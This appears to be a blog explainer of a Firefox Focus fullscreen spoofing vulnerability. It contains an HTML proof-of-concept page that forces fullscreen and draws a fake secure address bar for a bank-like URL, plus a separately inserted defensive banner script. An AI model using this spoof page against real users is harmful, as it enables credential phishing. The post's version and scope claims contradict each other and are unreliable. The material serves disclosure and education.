CVE-2023-25743 is a subtle but surprisingly dangerous vulnerability that was discovered in Firefox Focus, Mozilla’s privacy-focused mobile browser. This bug allowed malicious websites to take advantage of a missing “in-app notification” when entering fullscreen mode. As a result, attackers could mimic the look of browser controls (also called "browser chrome") to trick users into thinking phishing pages were genuine.

If you’re using regular Firefox, good news—you’re safe. This CVE only affects Firefox Focus and some versions of Firefox ESR (Extended Support Release), specifically Firefox < 110 and Firefox ESR < 102.8. Let’s break down what happened, how an attacker could exploit it, and how it was fixed.

What Really Happened?

When a website enters fullscreen mode, browsers usually give a visual cue or notification, alerting the user to this change. This protects users from “UI redressing” attacks, where a malicious site pretends to be part of the browser or operating system.

In Firefox Focus, entering fullscreen didn’t trigger this warning. So after going fullscreen, an attacker could draw their own fake address bar or security indicators at the top of the screen, making it seem like you’re still browsing safely—even though you’re not.

1. You visit a malicious website, which requests fullscreen mode.
2. No notification warns you that you're entering fullscreen, so you might not notice anything changed.
3. The malicious website draws a fake address bar at the top of the page, copying Firefox's look and feel.
4. Now you might trust what you see, and even enter login info or other sensitive data into a fake site.

The Exploit in Action: Code Sample

Here’s a simple demonstration (for educational purposes only!). This example tricks the browser into fullscreen and overlays a fake address bar:

<!DOCTYPE html>
<html>
<head>
  <style>
    /* Fixed overlay pinned to the top edge, where the real address bar sits */
    #fake-address-bar {
      position: fixed;
      top: 0;
      left: 0;
      width: 100vw;
      height: 50px;
      background: #f9f9fa;
      border-bottom: 1px solid #ccc;
      z-index: 9999;
      font-family: sans-serif;
      display: flex;
      align-items: center;
      padding-left: 16px;
      box-sizing: border-box;
    }
    #fake-lock {
      color: #0a840a; /* green, imitating a "secure" padlock */
      margin-right: 8px;
    }
    #fake-url {
      color: #555;
      font-size: 14px;
    }
  </style>
</head>
<body>
  <div id="fake-address-bar">
    <span id="fake-lock">🔒</span>
    <span id="fake-url">https://accounts-bank.com/secure</span>
  </div>
  <h1>Welcome! Please sign in below.</h1>
  <!-- Fake login form could go here -->
  <script>
    // Trigger fullscreen automatically.
    // Note: the Fullscreen API normally requires a user gesture before the
    // browser honours this call.
    document.documentElement.requestFullscreen();
  </script>
</body>
</html>

When opened in a vulnerable Firefox Focus installation, this page immediately goes fullscreen—no pop-up or warning in sight. The user sees a fake address bar, possibly with a padlock, and everything looks legit.

Why Is This So Dangerous?

- Phishing attacks: Users trust browser UI elements (like address bars and padlocks). Faking these can massively boost the success rate of phishing.
- No visual warning: Most browsers alert users when a site hides most of their controls. Firefox Focus, due to this bug, didn’t—which gives attackers a big advantage.

How Was It Fixed?

Fixed versions: Firefox ESR 102.8 and up.

After the patch, entering fullscreen will alert the user, making it much harder for an attacker to pull off this trick without being noticed.
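As an added example (not Mozilla's code and not part of the original post), here is a page-side sketch of the "in-app fullscreen notification" that the fix restores: a banner that names the origin that went fullscreen, driven by the standard fullscreenchange event. It assumes a browser-like document object (fullscreenElement, addEventListener, createElement, body, defaultView); the real mitigation belongs in browser chrome, which page content cannot overdraw, but a site that embeds third-party frames can use the same event to warn its own users.

```javascript
// Added example, not from the advisory or Mozilla's code. Assumes a
// browser-like `doc`; in tests a constructed stand-in is used.

// The notice names the origin taken from the window itself, never from
// anything drawn in page content, so a spoofed address bar inside the
// content cannot change what the notice says.
function fullscreenNoticeText(origin, embedded) {
  const where = embedded ? ' (embedded frame)' : '';
  return `${origin}${where} is now full screen. Press Esc to exit.`;
}

// Installs a banner on `doc` that appears whenever an element enters
// fullscreen and hides after `showMs` or when fullscreen is exited.
// `schedule` defaults to setTimeout and is injectable for testing.
// Returns the banner element so callers can inspect or restyle it.
function installFullscreenNotice(doc, { showMs = 4000, schedule = setTimeout } = {}) {
  const banner = doc.createElement('div');
  banner.setAttribute('role', 'status');
  banner.hidden = true;
  // Fixed position and maximal z-index so page content cannot draw over it.
  banner.style.cssText =
    'position:fixed;top:0;left:0;right:0;z-index:2147483647;padding:12px;' +
    'background:#000;color:#fff;text-align:center;font:14px sans-serif';
  doc.body.appendChild(banner);

  // fullscreenchange fires on every ancestor document, so a frame going
  // fullscreen is seen here too; then doc.fullscreenElement is the <iframe>.
  doc.addEventListener('fullscreenchange', () => {
    const el = doc.fullscreenElement;
    if (!el) {
      banner.hidden = true; // fullscreen was exited
      return;
    }
    const embedded = el.tagName === 'IFRAME';
    banner.textContent = fullscreenNoticeText(doc.defaultView.location.origin, embedded);
    banner.hidden = false;
    schedule(() => { banner.hidden = true; }, showMs);
  });
  return banner;
}
```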

References and Further Reading

- Mozilla Security Advisory: MFSA 2023-08
- Official CVE Entry: CVE-2023-25743 on CVE.org
- Bugzilla Report (Mozilla’s bug tracker): Bug 1816446
- Understanding Fullscreen API Security

Conclusion & Recommendations

If you use Firefox Focus, update NOW to the latest version. This bug shows how even small usability issues (like a missing notification) can open the door for serious attacks, including phishing and UI spoofing.

Stay safe, and keep your browsers updated!

*This CVE only affects Firefox Focus. Regular Firefox and other browsers are NOT affected by this issue.*

Timeline

Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/09/2023 18:23:00 UTC